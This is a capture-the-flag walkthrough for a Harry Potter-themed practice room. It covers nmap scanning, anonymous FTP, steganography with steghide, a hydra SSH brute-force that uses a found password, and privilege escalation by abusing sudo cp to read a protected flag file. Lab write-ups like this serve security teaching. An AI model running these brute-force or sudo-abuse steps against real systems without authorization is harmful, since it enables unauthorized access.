Harry Potter – CTF Walkthrough

CTF Walkthrough

Hello there, welcome to the official write-up of Harry Potter – CTF. I created this room for fun. I made this room in a few hours. If anyone is interested in knowing how to create a TryHackMe room, please comment down. I am using Kali Linux for this walkthrough. If you have a problem understanding any Linux command, check out Explain Shell.

Enumeration

We can begin by starting the machine by clicking the green button “Start Machine”, and wait till the IP Address appears.

We will perform a Nmap scan on the IP Address. If you are unfamiliar with Nmap, check out this “Nmap Tutorial to find Network Vulnerabilities“. For that, we will use the following syntax.

“nmap -A ipaddress”

After performing the Nmap scan, we discover that the host has few services running, like FTP, SSH, and HTTP web server. We also gathered some information regarding the Operating System of the host, and it appears to be running Ubuntu.

FTP Server

The host supports anonymous FTP login without a password, and there is a file named “resurrection_stone.flag“. To connect to the FTP, write the following command.

ftp ipaddress

Once we connect to the FTP service, it will prompt for a name, so provide “anonymous” as a name.

Now use the “ls” command to list the FTP directory’s content. There is a file named “resurrection_stone.flag”. To download it, use the following command.

get filename

Type “quit” to exit the FTP service.

Now, look at the content of the file by using the following command.

cat resurrection_stone.flag

Hurray! we got our first flag. Since we do not have SSH credentials, we should check out the webpage on the host web server, and we know that the host is using an Nginx Server as the web server.

Webserver

We are greeted with a welcome page from Hogwarts, and we see a clue in the paragraph section of the page. It asks for a spell; let’s see if we can find anything in the source.

We see a comment saying “<!– use the unlocking charm –>”. After a quick google search, there is an incantation in Harry Potter called “Alohomora”, and we can look for this as a directory.

There is a page called “alohomora”, which has a quiz-like form. If anyone here is a Harry Potter fan, then answer the questions. (Well, you can always use google.)

Once we have answered the questions, we are given a URL. The URL looks to be pointing us to an image(.jpg). We can download the image with the “wget” command.

wget url

Steganography

We can look at the metadata to gather information regarding the image, using the following command to view the metadata.

exiftool filename.jpg

After a close inspection, we have two findings, and the description has a phase “I solemnly swear I am up to no good.” and the comment “lowercase and underscore.” after a quick googling, e.g. “I solemnly swear I am up to no good harry potter.” We come across a name, “Marauder’s map”.

We got a name and a clue that says use lowercase and underscore. Now we can perform a steganography check on the image file. We can use steghide to extract the hidden file with the password “marauders_map”. We can use steghide to extract the hidden file. Use the following command.

steghide extract -sf filename.jpg

After extracting the hidden file from the golden_egg.jpg, we get an anonymous note. We can look at the text file with the “cat” command.

We can see a password in the note; since the SSH service is running on the host, the password must be related to SSH. However, we still need a username, and by looking at the message (if you are not a harry potter fan, google it), we can say that Albus Dumbledore left this message.

Brute-Force Attack

We have the password but do not have a valid username so we will use hydra to brute-force our way in with a different username. If you are unfamiliar with the hydra, check out OffSec Services documentation.

First, let’s create a user wordlist with different combinations of dumbledore’s name. As shown below, we can use the wordlist generator to make the process quick.

We will use this website called Weakpass to generate a bunch of possible usernames with information we have.

Now, we will copy all the possible usernames into a text file named “username.txt” and use hydra to brute force into the host machine. Use the following command. To learn more about password cracking, check out How to Crack a Password by Guru99.

hydra -L username.txt -p h0gwArts1sAmAg1cAlplAce 10.10.224.78 ssh

We use “-L” to define the username wordlist, and “-p” for telling the password we possess, and then the IP address, and at the end, we describe the service we want to brute-force. If you do not understand this, head to Linux for Devices to learn more about SSH brute-forcing with Hydra.

We have successfully cracked the username and can now log in with the credentials. Use the following command.

ssh dumbledore@10.10.145.49

If you have never used SSH before, you read this article, How to Use SSH to Connect to a Remote Server in Linux or Windows by phoenixNAP. 

Privilege Escalation

We found an “invisibility_cloak.flag” in the current directory. Hurray! We found another flag, and now we have one last flag left. After looking around a bit, we found the last flag in the Voldemort directory. When we try to access it, we get a permission error.

We can check our privilege by trying a sudo command, and it looks like we do not have sudo permission. Still, we can check if we can run any command with elevated privileges. Use the following command.

sudo -l

We can use the copy command “cp” as sudo, so let’s see what we can do with “cp” from.

We can use the commands mentioned below to read the flag.

LFILE=file_to_read
sudo cp “$LFILE” /dev/stdout

Voila! We have accessed the final flag too.

Questions & Answers

1. What’s the name of the spell?
2. What’s the secret phrase to unlocking the golden egg?
3. Invisibility cloak
4. Resurrection Stone
5. Elder Wand

We have found all the flags above, and all the answers are mentioned above.

Conclusion

So far, we have learned about FTP, SSH, and HTTP services. We also used Steghide and Hydra, and we learned how they work and can be used for specific tasks such as hiding files and brute forcing services. If you have enjoyed my writing, please to my blog.

Tags

Share This Post